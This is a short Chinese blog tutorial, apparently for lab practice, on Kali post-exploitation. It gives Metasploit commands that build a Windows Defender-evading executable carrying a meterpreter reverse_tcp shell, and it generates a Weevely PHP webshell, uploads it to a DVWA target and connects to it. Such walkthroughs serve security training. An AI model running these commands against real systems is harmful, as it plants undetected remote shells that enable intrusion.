这篇博客介绍了如何在Kali Linux中使用PostExploitation工具,特别是OSBackdoors,启动Python Web服务器,并在Windows测试机上利用Powershell进行免杀攻击。通过Metasploit框架展示如何选择免杀模块,设置参数并执行payload。此外,还讲解了如何创建并使用PHP网页木马Weevely,以及如何在靶机上上传和激活。博客还提到了文件隐藏和远程操作命令的使用。
在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具
点击后其实是进入一个目录
然后利用python启动一个WEB服务器
在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000
msf框架里的evasion
- msfconsole
- show evasion // 查看免杀模块
- use evasion/windows/windows_defender_exe
- show options // 查看参数
- set filename test.exe //自己定义一个文件名,不然是随机起名
- set payload windows/meterpreter/reverse_tcp
- run
这是一个隐藏目录
可以使用命令
将文件移动到可视位置
学习时可以扔到https://www.virscan.org等平台检测一下
weevely只能生成PHP的网页木马 在kali里执行
weevely generate 123456 /home/kali/test.php
其中123456是密码
到靶机dvwa上传
上传成功后,根据页面提示的路径访问一下木马网页
回到kali,执行
- weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
- 密码要放在最后,且须与前面设置的一致
输入 help 查看可用的远程操作的命令
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
